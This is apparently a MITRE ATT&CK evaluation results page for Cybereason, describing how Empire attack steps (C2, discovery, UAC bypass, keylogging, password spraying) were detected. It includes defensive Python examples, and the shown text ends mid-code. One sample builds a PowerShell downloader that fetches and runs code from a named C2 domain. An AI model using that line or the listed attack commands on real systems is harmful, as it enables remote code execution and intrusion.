Telemetry showed the logon session for Jesse to Conficker (10.0.0.5) as a Remote Interactive Logon Type. Telemetry also showed a connection over port 3389 to Conficker (10.0.0.5) through rundll32.exe serving as a proxy. The telemetry was tainted by a parent Injected Shellcode alert.
Telemetry of logon session for Jesse from Nimda (10.0.1.6) to Conficker (10.0.0.5) with Remote Interactive Logon Type
Telemetry showing a TCP port 3389 connection to Conficker (10.0.0.5)
Telemetry showing rundll32.exe process used to proxy connection over port 3389 from Nimda (10.0.1.6) to Conficker (10.0.0.5) (tainted by a parent Injected Shellcode alert)
Valid Accounts
(T1078)
Telemetry
  
Telemetry showed the logon session for Jesse to Conficker (10.0.0.5) as a Remote Interactive Logon Type.
Telemetry of logon session for Jesse from Nimda (10.0.1.6) to Conficker (10.0.0.5) with Remote Interactive Logon Type
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Specific Behavior
  
A Specific Behavior alert was generated for powershell.exe, labeled with Command and Control as well as Malicious use of PowerShell. The alert was tagged as an Obfuscated PowerShell payload and mapped to the correct ATT&CK Tactic (Execution) and Technique (PowerShell).
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe execution, including decoded full command-line arguments, as well as wscript.exe executing autoupdate.vbs. The telemetry was tainted by a parent PowerShell alert.
Specific Behavior alert for powershell.exe, labeled with Command and Control and Malicious use of PowerShell
Specific Behavior alert tagged as obfuscated PowerShell payload and downloader mapped to the correct ATT&CK Tactic (Execution) and Technique (PowerShell)
Telemetry showing decoded PowerShell command with command-line arguments (tainted by a parent PowerShell alert)
Telemetry showing wscript.exe executing autoupdate.vbs (tainted by a parent PowerShell alert)
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Enrichment (Tainted)
  
 
The capability enriched powershell.exe as making a connection over an "HTTP Port". The data was tagged with the correct ATT&CK Technique (Commonly Used Port) and Tactic (Command and Control) and was tainted by a parent PowerShell alert.
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe making an outgoing connection on TCP port 443 to 192.168.0.5 (C2 Server). Telemetry also showed decoded command-line arguments to perform an HTTPS connection to freegoogleadsenseinfo.com (C2 domain) over port 443. The telemetry was tainted by a parent PowerShell alert.
Enrichment of powershell.exe making a connection over an "HTTP Port," tagged with the correct ATT&CK Technique (Commonly Used Port) and Tactic (Command and Control) (tainted by a parent PowerShell alert)
Telemetry showing powershell.exe making an outgoing connection to 192.168.0.5 (C2 Server) over TCP port 443 (tainted by a parent PowerShell alert)
Telemetry showing decoded PowerShell command with command-line arguments (tainted by a parent PowerShell alert)
Standard Application Layer Protocol
(T1071)
Telemetry (Tainted)
  
 
Telemetry showed decoded command-line arguments to perform an HTTPS connection to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent PowerShell alert. Telemetry also showed that powershell.exe had an outgoing connection on port 443, identified as HTTP type traffic.
Telemetry showing decoded PowerShell command with command-line arguments (tainted by a parent PowerShell alert)
Telemetry showing powershell.exe making outgoing connection to 192.168.0.5 tagged with SERVICE_HTTP (Hypertext Transfer Protocol Over TLS/SSL (HTTPS)) (does not count as a detection)
Standard Cryptographic Protocol
(T1032)
Telemetry (Tainted)
  
 
Telemetry showed that powershell.exe had an outgoing connection on port 443, identified as HTTP type traffic. Telemetry also showed decoded command-line arguments to perform an HTTPS connection to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent PowerShell alert.
Telemetry showing powershell.exe making outgoing connection to 192.168.0.5 tagged with SERVICE_HTTP (Hypertext Transfer Protocol Over TLS/SSL (HTTPS)) (tainted by a parent PowerShell alert)
Telemetry showing decoded PowerShell command with command-line arguments (tainted by a parent PowerShell alert)
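The "decoded command-line arguments" telemetry in 11.A.1 and 11.B.1 is the product of one well-defined step: a launcher passes the script to powershell.exe as base64-encoded UTF-16LE via -EncodedCommand, so the C2 domain and port are invisible on the raw command line until that blob is decoded. The following is an added example, not code from this page or from Cybereason, of that decoding followed by indicator extraction. The sample launcher and its script are constructed for the example; only the C2 domain (freegoogleadsenseinfo.com) and port 443 come from the page.

```python
import base64
import re
from typing import Optional

# Constructed sample, not a capture from the evaluation: an Empire-style
# launcher whose payload reaches the C2 domain named on this page over 443.
SAMPLE_SCRIPT = (
    "$wc=New-Object Net.WebClient;"
    "$wc.Headers.Add('User-Agent','Mozilla/5.0');"
    "$s='https://freegoogleadsenseinfo.com:443';"
    "IEX $wc.DownloadString($s+'/index.asp');"
)


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_CMDLINE = "powershell.exe -NoP -sta -NonI -W Hidden -Enc " + encode_command(SAMPLE_SCRIPT)


def _is_encoded_switch(token: str) -> bool:
    # powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...)
    # plus the alias -ec, with either - or / as the switch character. A regex
    # for just "-enc" misses launchers that use the shorter spellings.
    if len(token) < 2 or token[0] not in "-/":
        return False
    key = token[1:].lower()
    return key == "ec" or "encodedcommand".startswith(key)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by an -EncodedCommand launcher, or None if there is none."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_switch(tok):
            blob = tokens[i + 1]
            blob += "=" * (-len(blob) % 4)  # tolerate stripped base64 padding
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


_URL_RE = re.compile(r"\b(https?)://([A-Za-z0-9.-]+)(?::(\d{1,5}))?", re.IGNORECASE)
_DOWNLOADER_RE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-Expression|\bIEX\b", re.IGNORECASE
)


def extract_indicators(script: str) -> dict:
    """Pull C2 URLs (with the implied port) and downloader primitives out of a decoded script."""
    urls = []
    for scheme, host, port in _URL_RE.findall(script):
        scheme = scheme.lower()
        default = 443 if scheme == "https" else 80
        urls.append((scheme, host.lower(), int(port) if port else default))
    return {"urls": urls, "downloader": bool(_DOWNLOADER_RE.search(script))}


def analyze_cmdline(cmdline: str) -> dict:
    """What an analyst wants from a PowerShell launcher: the decoded script and its network indicators."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "script": None, "urls": [], "downloader": False}
    return {"encoded": True, "script": script, **extract_indicators(script)}


if __name__ == "__main__":
    result = analyze_cmdline(SAMPLE_CMDLINE)
    print(result["script"])
    for scheme, host, port in result["urls"]:
        print(f"{scheme} {host}:{port}")
    print("downloader primitives:", result["downloader"])
```

The switch matching is deliberately a prefix test rather than a fixed list: powershell.exe resolves -e, -en and every longer prefix to -EncodedCommand, and a detection keyed on the literal string "-enc" is trivially sidestepped. The URL port is filled in from the scheme when absent so the 443 seen in the network telemetry can be matched against the command line.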
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed route.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing route.exe executing with command-line arguments (tainted by a parent PowerShell alert)
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Enrichment (Tainted)
  
 
The capability enriched ipconfig.exe executing with command-line arguments with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed ipconfig.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of ipconfig.exe executing with correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) (tainted by a parent PowerShell alert)
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner / User Discovery
(T1033)
Enrichment (Tainted)
  
 
The capability enriched whoami.exe executing as Reconnaissance and the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed whoami.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of whoami.exe executing as Reconnaissance and the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery) (tainted by a parent PowerShell alert)
Enrichment of whoami.exe executing with labels for Reconnaissance and Accounts discovery
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
Enrichment (Tainted)
  
 
The capability enriched qprocess.exe executing as Reconnaissance and Local process discovery as well as the correct ATT&CK Technique (Process Discovery) and Tactic (Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed qprocess.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of qprocess.exe executing with correct ATT&CK Technique (Process Discovery) and Tactic (Discovery) (tainted by a parent PowerShell alert)
Enrichment of qprocess.exe executing with labels for Reconnaissance and Local process discovery
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery)
Process tree showing alerted net.exe with correct ATT&CK Technique (System Service Discovery) (tainted by a parent PowerShell alert)
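Two ideas recur through steps 12.A to 13.C: a discovery command such as net.exe or whoami.exe is enriched with an ATT&CK technique, and it is "tainted" when it descends from a process that already raised an alert (here the PowerShell alert from 11.A.1). The following is an added example, not code from this page or from Cybereason, that implements both over a constructed process tree: ancestry is walked from the alerted PIDs to mark descendants, and command lines are mapped to the technique labels this page uses for them. The PIDs, the process records and the pid 500 control case (the same net use without a suspicious ancestor) are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed process-creation records, not the evaluation's telemetry,
# shaped like the page's steps 11.A.1 and 12.x: autoupdate.vbs launches
# powershell.exe (the alerted process), which spawns the discovery commands.
# pid 500 is the control case: the same command without a suspicious ancestor.
SAMPLE_PROCS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "wscript.exe",    "cmdline": 'wscript.exe "C:\\Users\\Bob\\Downloads\\autoupdate.vbs"'},
    {"pid": 300, "ppid": 200, "image": "powershell.exe", "cmdline": "powershell.exe -NoP -sta -NonI -W Hidden"},
    {"pid": 400, "ppid": 300, "image": "net.exe",        "cmdline": "net start"},
    {"pid": 401, "ppid": 300, "image": "whoami.exe",     "cmdline": "whoami /all /fo list"},
    {"pid": 402, "ppid": 300, "image": "net.exe",        "cmdline": 'net group "Domain Admins" /domain'},
    {"pid": 403, "ppid": 402, "image": "net1.exe",       "cmdline": 'C:\\Windows\\system32\\net1 group "Domain Admins" /domain'},
    {"pid": 404, "ppid": 300, "image": "net.exe",        "cmdline": 'net group "Domain Computers" /domain'},
    {"pid": 500, "ppid": 100, "image": "net.exe",        "cmdline": "net use"},
]
ALERTED_PIDS = {300}  # the process that carries the "Malicious use of PowerShell" alert

# Command-line patterns and the ATT&CK techniques this page maps them to.
# Order matters: the Domain Computers rule must win over the generic net group rule.
_RULES = [
    (r'^net1? group "domain computers"', "T1018", "Remote System Discovery"),
    (r"^net1? (group|localgroup)\b",      "T1069", "Permission Groups Discovery"),
    (r"^net1? user\b",                     "T1087", "Account Discovery"),
    (r"^net1? start\b",                    "T1007", "System Service Discovery"),
    (r"^net1? use\b(?!.*/delete)",         "T1049", "System Network Connections Discovery"),
    (r"^netstat\b",                        "T1049", "System Network Connections Discovery"),
    (r"^(ipconfig|route)\b",               "T1016", "System Network Configuration Discovery"),
    (r"^whoami\b",                         "T1033", "System Owner/User Discovery"),
    (r"^qprocess\b",                       "T1057", "Process Discovery"),
    (r"^reg query\b",                      "T1012", "Query Registry"),
]
_COMPILED = [(re.compile(p, re.IGNORECASE), t, n) for p, t, n in _RULES]


def normalize_cmdline(cmdline: str) -> str:
    """Reduce 'C:\\Windows\\system32\\net1.exe  group ...' to 'net1 group ...' for rule matching."""
    s = cmdline.strip()
    if s.startswith('"'):                      # quoted image path, possibly with spaces
        end = s.find('"', 1)
        if end < 0:
            end = len(s)
        head, rest = s[1:end], s[end + 1:]
    else:
        head, _, rest = s.partition(" ")
    head = head.replace("/", "\\").rsplit("\\", 1)[-1]
    if head.lower().endswith(".exe"):
        head = head[:-4]
    return (head + " " + " ".join(rest.split())).strip()


def classify(cmdline: str):
    """Map a discovery command line to (technique_id, name), or None if no rule applies."""
    norm = normalize_cmdline(cmdline)
    for rx, tid, name in _COMPILED:
        if rx.search(norm):
            return tid, name
    return None


def taint_from_alerts(procs, alerted_pids):
    """Return {pid: alerted_ancestor_pid} for every descendant of an alerted process.

    This is the 'tainted' relationship the page describes: a net.exe that looks
    like ordinary admin activity becomes interesting because an ancestor already
    fired an alert. PID reuse is ignored here; real telemetry should key on a
    process GUID plus start time rather than a bare PID.
    """
    children = defaultdict(list)
    for p in procs:
        children[p["ppid"]].append(p["pid"])
    taint = {}
    stack = [(pid, pid) for pid in alerted_pids]
    while stack:
        pid, root = stack.pop()
        for child in children.get(pid, []):
            if child not in taint and child not in alerted_pids:
                taint[child] = root
                stack.append((child, root))
    return taint


def enrich(procs, alerted_pids):
    """Classify every process matching a discovery rule and note which alert, if any, taints it."""
    taint = taint_from_alerts(procs, alerted_pids)
    findings = []
    for p in procs:
        hit = classify(p["cmdline"])
        if hit is None:
            continue
        tid, name = hit
        findings.append({"pid": p["pid"], "image": p["image"], "technique": tid,
                         "name": name, "tainted_by": taint.get(p["pid"])})
    return findings


if __name__ == "__main__":
    for f in enrich(SAMPLE_PROCS, ALERTED_PIDS):
        flag = f"tainted by pid {f['tainted_by']}" if f["tainted_by"] else "untainted telemetry"
        print(f"pid {f['pid']:>4} {f['image']:<14} {f['technique']} {f['name']} ({flag})")
```

The net1.exe child (pid 403) matters in practice: net.exe hands most subcommands to net1.exe, so a rule that only looks at the image name net.exe, or that only checks the direct parent, loses the command line or the taint one hop down. The walk is from alerted PIDs downward, so a single alert on powershell.exe is enough to mark every later discovery command, which is exactly the "tainted" qualifier the page applies to them.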
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a malicious command, which was identified as the Invoke-WinEnum function. The alert also identified the PowerShell commands as suspicious, which were tagged with the correct ATT&CK Technique (PowerShell) and Tactic (Execution). The alert was tainted by a parent PowerShell alert.
Telemetry (Tainted)
  
 
Telemetry showed the PowerShell Script module (.psm1) being written to the temp folder. The telemetry was tainted by a parent PowerShell alert.
Specific Behavior alert for Malicious use of PowerShell (tainted by a parent PowerShell alert)
Specific Behavior alert for a PowerShell Malicious command, identified as the Invoke-WinEnum function
Telemetry showing the temp write of the psm1 script module (tainted by a parent PowerShell alert)
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner / User Discovery
(T1033)
None
  
No detection capability demonstrated for this procedure.
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
  
No detection capability demonstrated for this procedure.
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
Telemetry (Tainted)
  
 
Telemetry showed the decoded powershell.exe function to gather clipboard data. The telemetry was tainted by a parent PowerShell alert.
Telemetry of the PowerShell function to gather clipboard data (tainted by a parent PowerShell alert)
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
None
  
No detection capability demonstrated for this procedure.
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
  
No detection capability demonstrated for this procedure.
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
None
  
No detection capability demonstrated for this procedure.
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
None
  
No detection capability demonstrated for this procedure.
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Enrichment (Tainted)
  
 
The capability enriched netstat.exe executing as Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed netstat.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enriched alert for netstat.exe labeled with Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery) (tainted by a parent PowerShell alert)
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permission Groups Discovery
(T1069)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Network Connections Discovery). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
General Behavior alert for net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Network Connections Discovery)
Process tree showing alerted net.exe executing with command-line arguments (tainted by a parent PowerShell alert)
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Enrichment (Tainted)
  
 
The capability enriched netstat.exe executing as Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed netstat.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment showing netstat.exe executing as Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery) (tainted by a parent PowerShell alert)
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert.
Telemetry showing reg.exe with command-line arguments (tainted by a parent PowerShell alert)
14.A.1
Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)
Bypass User Account Control
(T1088)
Telemetry (Tainted)
  
 
Telemetry showed an integrity level change from medium to high for powershell.exe, which is indicative of a UAC bypass. The telemetry was tainted by a parent Malicious use of PowerShell alert.
Telemetry showing powershell.exe executing with medium process integrity (tainted by a parent PowerShell alert)
Telemetry showing powershell.exe executing with high process integrity (tainted by a parent PowerShell alert)
Parent alert generated for malicious use of PowerShell
Commonly Used Port
(T1043)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for powershell.exe executed as a PowerShell downloader. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port). Data also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with an HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed powershell.exe making a network connection over port 8080. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Specific Behavior alert for powershell.exe mapped to the correct ATT&CK Tactic (Command and Control) and Technique (Commonly Used Port) (tainted by a parent PowerShell alert)
Specific Behavior alert showing decoded PowerShell with download request of wdbypass over HTTP port 8080
Remote File Copy
(T1105)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated based on the downloading and execution of wdbypass, identified as Fileless malware, from freegoogleadsenseinfo.com (C2 domain) over port 8080. The alert also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with an HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert.
Specific Behavior alert for Download & execute of the wdbypass file
Specific Behavior alert showing decoded PowerShell with download request of wdbypass over HTTP port 8080
Standard Application Layer Protocol
(T1071)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for powershell.exe executed as a PowerShell downloader. The alert was tagged with the correct ATT&CK Tactic (Command and Control) and Technique (Standard Application Layer Protocol). Data also showed decoded PowerShell commands extracted from the command-line arguments showing a connection over port 8080 with an HTTP request to download the wdbypass payload. The alert was tainted by a parent PowerShell alert.
Specific Behavior alert for powershell.exe mapped to the correct ATT&CK Tactic (Command and Control) and Technique (Standard Application Layer Protocol) (tainted by a parent PowerShell alert)
Specific Behavior alert showing decoded PowerShell with download request of wdbypass over HTTP port 8080
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
Input Capture
(T1056)
Indicator of Compromise
  
An Indicator of Compromise alert was generated based on the execution of a malicious command in PowerShell named Get-Keystrokes.
Telemetry
  
Telemetry showed modloads associated with the execution of a keylogger.
Indicator of Compromise alert for Malicious Command Get-Keystrokes 
Telemetry showing modloads associated with a keylogger
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
None
  
No detection capability demonstrated for this procedure. 
16.A.1
Empire: 'net use' via PowerShell to perform password-spraying (brute force) authentication attempts against Morris (10.0.1.4) and Nimda (10.0.1.6), targeting the credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Enrichment (Tainted)
  
 
The capability enriched net.exe execution with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of net.exe execution with related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Frieda with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Bob with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Windows Admin Shares
(T1077)
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The alert was tainted by a parent PowerShell alert.
Telemetry
  
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance.
Enrichment of net.exe execution with related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Frieda with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Kmitnick with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
Enrichment of net.exe execution showing logon attempts for the user Bob with related ATT&CK Technique (Windows Admin Shares) and Tactic (Lateral Movement) (tainted by a parent PowerShell alert)
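In 16.A.1 the capability does not name the spray as Brute Force; it is credited through a Lateral Movement enrichment plus a connection-rate label, and the Brute Force technique is only inferred. The signal that distinguishes a spray from ordinary failed logons is the number of distinct users one source tries in a short window, not attempts per user. The following is an added example, not code from this page or from Cybereason, of that detection run over constructed authentication records shaped like this step (Kmitnick, Bob and Frieda against Morris and Nimda, then the Kmitnick success against Conficker from 16.B.1). The timestamps, the source address 10.0.1.5 for CodeRed and the benign second source are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication records modelled on step 16.A.1, not telemetry
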